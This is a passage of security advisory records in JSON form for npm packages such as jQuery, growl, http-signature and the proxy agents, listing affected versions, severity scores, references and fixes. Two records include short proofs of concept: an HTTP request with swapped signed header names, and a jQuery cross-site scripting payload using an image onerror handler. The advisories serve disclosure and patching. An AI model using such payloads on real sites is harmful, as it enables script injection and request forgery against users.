"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1059092" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-06-04T18:30:45Z", "nvd_published_at": "2021-06-03T16:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r9q4-w3fm-wrm2", "published": "2020-09-02T21:21:43Z", "modified": "2021-09-27T21:01:47Z", "summary": "Cross-Site Scripting in google-closure-library", "details": "Versions of `google-closure-library` prior to 20190301.0.0 are vulnerable to Cross-Site Scripting. The `safedomtreeprocessor.processToString()` function improperly processed empty elements, which could allow attackers to execute arbitrary JavaScript through Mutation Cross-Site Scripting.\n\n\n## Recommendation\n\nUpgrade to version 20190301.0.0 or later.", "affected": [ { "package": { "name": "google-closure-library", "ecosystem": "npm", "purl": "pkg:npm/google-closure-library" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "20190301.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-r9q4-w3fm-wrm2/GHSA-r9q4-w3fm-wrm2.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa#commitcomment-33294853" }, { "type": "PACKAGE", "url": "https://github.com/google/closure-library" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-GOOGLECLOSURELIBRARY-174519" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/878" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-08-31T18:39:08Z", 
"nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-vh5w-fg69-rc8m", "published": "2021-05-07T16:06:34Z", "modified": "2023-11-08T04:04:19.217106Z", "aliases": [ "CVE-2020-8910" ], "summary": "Improper Input Validation in Google Closure Library", "details": "A URL parsing issue in goog.uri of the Google Closure Library versions up to and including v20200224 allows an attacker to send malicious URLs to be parsed by the library and return the wrong authority. Mitigation -- update your library to version v20200315.", "affected": [ { "package": { "name": "google-closure-library", "ecosystem": "npm", "purl": "pkg:npm/google-closure-library" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "20200315.0.0" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 20200224.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-vh5w-fg69-rc8m/GHSA-vh5w-fg69-rc8m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8910" }, { "type": "WEB", "url": "https://github.com/google/closure-library/commit/294fc00b01d248419d8f8de37580adf2a0024fc9" }, { "type": "WEB", "url": "https://github.com/google/closure-library/releases/tag/v20200315" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2021-05-06T20:57:55Z", "nvd_published_at": "2020-03-26T12:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qh2h-chj9-jffq", "published": "2018-06-08T12:43:43Z", "modified": "2023-11-08T03:59:01.241655Z", "aliases": [ "CVE-2017-16042" ], "summary": "Growl before 1.10.0 vulnerable to Command Injection", "details": "Affected versions of `growl` do not properly sanitize input prior to passing it into a shell command, allowing for 
arbitrary command execution.\n\n\n## Recommendation\n\nUpdate to version 1.10.0 or later.", "affected": [ { "package": { "name": "growl", "ecosystem": "npm", "purl": "pkg:npm/growl" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.10.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/06/GHSA-qh2h-chj9-jffq/GHSA-qh2h-chj9-jffq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16042" }, { "type": "WEB", "url": "https://github.com/tj/node-growl/issues/60" }, { "type": "WEB", "url": "https://github.com/tj/node-growl/pull/61" }, { "type": "WEB", "url": "https://github.com/tj/node-growl/pull/62" }, { "type": "WEB", "url": "https://github.com/tj/node-growl/commit/d71177d5331c9de4658aca62e0ac921f178b0669" }, { "type": "PACKAGE", "url": "https://github.com/tj/node-growl" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/146" } ], "database_specific": { "cwe_ids": [ "CWE-78", "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:51:54Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pfq8-rq6v-vf5m", "published": "2022-10-31T19:00:36Z", "modified": "2025-06-11T17:34:37Z", "aliases": [ "CVE-2022-37620" ], "related": [ "CGA-mvv3-xjv4-w9gc" ], "summary": "kangax html-minifier REDoS vulnerability", "details": "A Regular Expression Denial of Service (ReDoS) flaw was found in kangax html-minifier 4.0.0 because of the reCustomIgnore regular expression.", "affected": [ { "package": { "name": "html-minifier", "ecosystem": "npm", "purl": "pkg:npm/html-minifier" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "4.0.0" } ] } ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-pfq8-rq6v-vf5m/GHSA-pfq8-rq6v-vf5m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-37620" }, { "type": "WEB", "url": "https://github.com/kangax/html-minifier/issues/1135" }, { "type": "PACKAGE", "url": "https://github.com/kangax/html-minifier" }, { "type": "WEB", "url": "https://github.com/kangax/html-minifier/blob/51ce10f4daedb1de483ffbcccecc41be1c873da2/src/htmlminifier.js#L1338" }, { "type": "WEB", "url": "https://github.com/kangax/html-minifier/blob/51ce10f4daedb1de483ffbcccecc41be1c873da2/src/htmlminifier.js#L294" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-HTMLMINIFIER-3091181" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2024-04-22T23:06:37Z", "nvd_published_at": "2022-10-31T12:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-86wf-436m-h424", "published": "2022-01-06T20:30:13Z", "modified": "2023-11-08T04:00:42.433382Z", "aliases": [ "CVE-2019-10196" ], "summary": "Resource Exhaustion Denial of Service in http-proxy-agent ", "details": "A flaw was found in http-proxy-agent, prior to version 2.1.0. It was discovered http-proxy-agent passes an auth option to the Buffer constructor without proper sanitization. 
This could result in a Denial of Service through the usage of all available CPU resources and data exposure through an uninitialized memory leak in setups where an attacker could submit typed input to the auth parameter.", "affected": [ { "package": { "name": "http-proxy-agent", "ecosystem": "npm", "purl": "pkg:npm/http-proxy-agent" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.1.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-86wf-436m-h424/GHSA-86wf-436m-h424.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10196" }, { "type": "WEB", "url": "https://github.com/TooTallNate/node-http-proxy-agent/commit/b7b7cc793c3226aa83f820ce5c277e81862d32eb" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1567245" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/607" } ], "database_specific": { "cwe_ids": [ "CWE-665" ], "github_reviewed": true, "github_reviewed_at": "2021-03-22T22:28:09Z", "nvd_published_at": "2021-03-19T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8w57-jfpm-945m", "published": "2019-06-11T16:16:07Z", "modified": "2023-04-11T00:26:58Z", "summary": "Denial of Service in http-proxy-agent", "details": "Versions of `http-proxy-agent` before 2.1.0 are vulnerable to denial of service and uninitialized memory leak when unsanitized options are passed to `Buffer`. 
An attacker may leverage these unsanitized options to consume system resources.\n\n\n## Recommendation\n\nUpdate to version 2.1.0 or later.", "affected": [ { "package": { "name": "http-proxy-agent", "ecosystem": "npm", "purl": "pkg:npm/http-proxy-agent" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.1.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-8w57-jfpm-945m/GHSA-8w57-jfpm-945m.json" } } ], "references": [ { "type": "WEB", "url": "https://hackerone.com/reports/321631" }, { "type": "WEB", "url": "https://github.com/TooTallNate/node-http-proxy-agent/blob/2.0.0/index.js#L80" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/607" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-06-11T16:11:38Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-q257-vv4p-fg92", "published": "2018-11-09T17:49:34Z", "modified": "2023-11-08T03:58:59.280300Z", "aliases": [ "CVE-2017-16005" ], "summary": "Header Forgery in http-signature", "details": "Affected versions of `http-signature` contain a vulnerability which can allow an attacker in a privileged network position to modify header names and change the meaning of the request, without requiring an updated signature. 
\n\nThis problem occurs because vulnerable versions of `http-signature` sign the contents of headers, but not the header names.\n\n## Proof of Concept\n\nConsider this to be the initial, untampered request:\n```http\nPOST /pay HTTP/1.1\nHost: example.com\nDate: Thu, 05 Jan 2012 21:31:40 GMT\nX-Payment-Source: src@money.com\nX-Payment-Destination: dst@money.com\nAuthorization: Signature keyId=\"Test\",algorithm=\"rsa-sha256\",headers=\"x-payment-source x-payment-destination\" MDyO5tSvin5...\n```\n\nAnd the request is intercepted and tampered as follows:\n```http\nX-Payment-Source: dst@money.com // Emails switched\nX-Payment-Destination: src@money.com\nAuthorization: Signature keyId=\"Test\",algorithm=\"rsa-sha256\",headers=\"x-payment-destination x-payment-source\" MDyO5tSvin5...\n```\n\nIn the resulting responses, both requests would pass signature verification without issue.\n```\nsrc@money.com\\n\ndst@money.com\\n\n```\n\n\n\n## Recommendation\n\nUpdate to version 0.10.0 or higher.", "affected": [ { "package": { "name": "http-signature", "ecosystem": "npm", "purl": "pkg:npm/http-signature" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.10.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/11/GHSA-q257-vv4p-fg92/GHSA-q257-vv4p-fg92.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16005" }, { "type": "WEB", "url": "https://github.com/joyent/node-http-signature/issues/10" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-q257-vv4p-fg92" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/318" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:50:21Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { 
"schema_version": "1.7.3", "id": "GHSA-8g7p-74h8-hg48", "published": "2018-07-27T17:04:52Z", "modified": "2023-11-08T04:00:18.222205Z", "aliases": [ "CVE-2018-3739" ], "summary": "Denial of Service in https-proxy-agent", "details": "Versions of `https-proxy-agent` before 2.2.0 are vulnerable to denial of service. This is due to unsanitized options (proxy.auth) being passed to `Buffer()`.\n\n\n## Recommendation\n\nUpdate to version 2.2.0 or later.", "affected": [ { "package": { "name": "https-proxy-agent", "ecosystem": "npm", "purl": "pkg:npm/https-proxy-agent" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.2.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-8g7p-74h8-hg48/GHSA-8g7p-74h8-hg48.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-3736" }, { "type": "WEB", "url": "https://github.com/TooTallNate/node-https-proxy-agent/commit/1c24219df87524e6ed973127e81f30801d658f07" }, { "type": "WEB", "url": "https://hackerone.com/reports/319532" }, { "type": "PACKAGE", "url": "https://github.com/TooTallNate/node-https-proxy-agent" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-8g7p-74h8-hg48" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/593" } ], "database_specific": { "cwe_ids": [ "CWE-125", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:25:32Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pc5p-h8pf-mvwp", "published": "2020-04-16T03:14:56Z", "modified": "2023-11-01T20:54:11Z", "summary": "Machine-In-The-Middle in https-proxy-agent", "details": "Versions of `https-proxy-agent` prior to 2.2.3 are vulnerable to Machine-In-The-Middle. 
The package fails to enforce TLS on the socket if the proxy server responds to the request with an HTTP status different than 200. This allows an attacker with access to the proxy server to intercept unencrypted communications, which may include sensitive information such as credentials.\n\n\n## Recommendation\n\nUpgrade to version 3.0.0 or 2.2.3.", "affected": [ { "package": { "name": "https-proxy-agent", "ecosystem": "npm", "purl": "pkg:npm/https-proxy-agent" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.2.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-pc5p-h8pf-mvwp/GHSA-pc5p-h8pf-mvwp.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/TooTallNate/node-https-proxy-agent/commit/36d8cf509f877fa44f4404fce57ebaf9410fe51b" }, { "type": "WEB", "url": "https://hackerone.com/reports/541502" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-HTTPSPROXYAGENT-469131" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1184" } ], "database_specific": { "cwe_ids": [ "CWE-300" ], "github_reviewed": true, "github_reviewed_at": "2020-04-16T03:03:19Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2pqj-h3vj-pqgw", "published": "2020-09-01T16:41:46Z", "modified": "2024-03-08T05:20:14.907785Z", "aliases": [ "CVE-2012-6708" ], "summary": "Cross-Site Scripting in jquery", "details": "Affected versions of `jquery` are vulnerable to cross-site scripting. This occurs because the main `jquery` function uses a regular expression to differentiate between HTML and selectors, but does not properly anchor the regular expression. 
The result is that `jquery` may interpret HTML as selectors when given certain inputs, allowing for client side code execution.\n\n## Proof of Concept\n```\n$(\"#log\").html(\n $(\"element[attribute='\u003cimg src=\\\"x\\\" onerror=\\\"alert(1)\\\" /\u003e']\").html()\n);\n```\n\n\n\n\n## Recommendation\n\nUpdate to version 1.9.0 or later.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.9.0" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.8.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-2pqj-h3vj-pqgw/GHSA-2pqj-h3vj-pqgw.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.9.0" } ] } ], "versions": [ "1.7.2", "1.7.3", "1.8.2", "1.8.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.8.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-2pqj-h3vj-pqgw/GHSA-2pqj-h3vj-pqgw.json" } }, { "package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.9.0" } ] } ], "versions": [ "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.5.0", "1.5.1", "1.5.2", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.7.0", "1.7.1", "1.7.1.1", "1.7.2", "1.8.0", "1.8.1", "1.8.2", "1.8.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.8.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-2pqj-h3vj-pqgw/GHSA-2pqj-h3vj-pqgw.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", 
"events": [ { "introduced": "0" }, { "fixed": "2.2.0" } ] } ], "versions": [ "0.1.1", "0.1.2", "0.1.3", "0.2", "0.2.1", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "1.0", "1.0.1", "1.0.10", "1.0.11", "1.0.12", "1.0.13", "1.0.14", "1.0.15", "1.0.16", "1.0.17", "1.0.18", "1.0.19", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.0.rc", "2.0.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-2pqj-h3vj-pqgw/GHSA-2pqj-h3vj-pqgw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16011" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-6708" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/05531fc4080ae24070930d15ae0cea7ae056457d" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227132049/http://www.securityfocus.com/bid/102792" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:jquery:20120206" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-DOTNET-JQUERY-450223" }, { "type": "WEB", "url": "https://research.insecurelabs.org/jquery/test" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://help.ecostruxureit.com/display/public/UADCE725/Security+fixes+in+StruxureWare+Data+Center+Expert+v7.6.0" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2012-6708.yml" }, { "type": "WEB", "url": 
"https://github.com/rails/jquery-rails/blob/v2.2.0/vendor/assets/javascripts/jquery.js#L67" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/v2.1.4/vendor/assets/javascripts/jquery.js#L59" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://bugs.jquery.com/ticket/9521" }, { "type": "WEB", "url": "https://bugs.jquery.com/ticket/6429" }, { "type": "WEB", "url": "https://bugs.jquery.com/ticket/12531" }, { "type": "WEB", "url": "https://bugs.jquery.com/ticket/11290" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/161972/Linksys-EA7500-2.0.8.194281-Cross-Site-Scripting.html" } ], "database_specific": { "cwe_ids": [ "CWE-64", "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-08-31T18:19:31Z", "nvd_published_at": "2018-01-18T23:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-579v-mp3v-rrw5", "published": "2022-05-14T01:09:51Z", "modified": "2024-12-08T05:33:53.323376Z", "aliases": [ "CVE-2011-4969" ], "summary": "jQuery vulnerable to Cross-Site Scripting (XSS)", "details": "Cross-site scripting (XSS) vulnerability in jQuery before 1.6.3, when using location.hash to select elements, allows remote attackers to inject arbitrary web script or HTML via a crafted tag.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.6.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-579v-mp3v-rrw5/GHSA-579v-mp3v-rrw5.json" } }, { 
"package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.6.3" } ] } ], "versions": [ "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.5.0", "1.5.1", "1.5.2", "1.6.0", "1.6.1", "1.6.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-579v-mp3v-rrw5/GHSA-579v-mp3v-rrw5.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.16" } ] } ], "versions": [ "0.1.1", "0.1.2", "0.1.3", "0.2", "0.2.1", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "1.0", "1.0.1", "1.0.10", "1.0.11", "1.0.12", "1.0.13", "1.0.14", "1.0.15", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.0.rc" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-579v-mp3v-rrw5/GHSA-579v-mp3v-rrw5.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.6.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-579v-mp3v-rrw5/GHSA-579v-mp3v-rrw5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-4969" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/db9e023e62c1ff5d8f21ed9868ab6878da2005e9" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": 
"https://security.netapp.com/advisory/ntap-20190416-0007" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-DOTNET-JQUERY-450224" }, { "type": "WEB", "url": "http://blog.jquery.com/2011/09/01/jquery-1-6-3-released" }, { "type": "WEB", "url": "http://blog.mindedsecurity.com/2011/07/jquery-is-sink.html" }, { "type": "WEB", "url": "http://bugs.jquery.com/ticket/9521" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2013/01/31/3" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-1722-1" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2022-09-12T14:46:34Z", "nvd_published_at": "2013-03-08T22:55:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-6c3j-c64m-qhgq", "published": "2019-04-26T16:29:11Z", "modified": "2025-01-15T01:41:55.110833Z", "aliases": [ "CVE-2019-11358" ], "summary": "XSS in jQuery as used in Drupal, Backdrop CMS, and other products", "details": "jQuery from 1.1.4 until 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles `jQuery.extend(true, {}, ...)` because of `Object.prototype` pollution. 
If an unsanitized source object contained an enumerable `__proto__` property, it could extend the native `Object.prototype`.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.1.4" }, { "fixed": "3.4.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-6c3j-c64m-qhgq/GHSA-6c3j-c64m-qhgq.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.3.4" } ] } ], "versions": [ "0.1.1", "0.1.2", "0.1.3", "0.2", "0.2.1", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "1.0", "1.0.1", "1.0.10", "1.0.11", "1.0.12", "1.0.13", "1.0.14", "1.0.15", "1.0.16", "1.0.17", "1.0.18", "1.0.19", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.0.rc", "2.0.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.3.0", "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.0.4", "3.1.0", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5", "4.0.0", "4.0.0.beta1", "4.0.0.beta2", "4.0.1", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.1.0", "4.1.1", "4.2.0", "4.2.1", "4.2.2", "4.3.0", "4.3.1", "4.3.2", "4.3.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-6c3j-c64m-qhgq/GHSA-6c3j-c64m-qhgq.json" } }, { "package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.1.4" }, { "fixed": "3.4.0" } ] } ], "versions": [ "1.10.0", "1.10.0.1", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.11.3", "1.12.0", "1.12.1", "1.12.2", "1.12.3", "1.12.4", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.5.0", "1.5.1", "1.5.2", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.7.0", 
"1.7.1", "1.7.1.1", "1.7.2", "1.8.0", "1.8.1", "1.8.2", "1.8.3", "1.9.0", "1.9.1", "2.0.0", "2.0.1", "2.0.1.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "3.0.0", "3.0.0.1", "3.1.0", "3.1.1", "3.2.1", "3.3.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-6c3j-c64m-qhgq/GHSA-6c3j-c64m-qhgq.json" } }, { "package": { "name": "django", "ecosystem": "PyPI", "purl": "pkg:pypi/django" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0a1" }, { "fixed": "2.1.9" } ] } ], "versions": [ "2.0", "2.0.1", "2.0.10", "2.0.12", "2.0.13", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.0a1", "2.0b1", "2.0rc1", "2.1", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.1.7", "2.1.8", "2.1a1", "2.1b1", "2.1rc1" ], "database_specific": { "source": 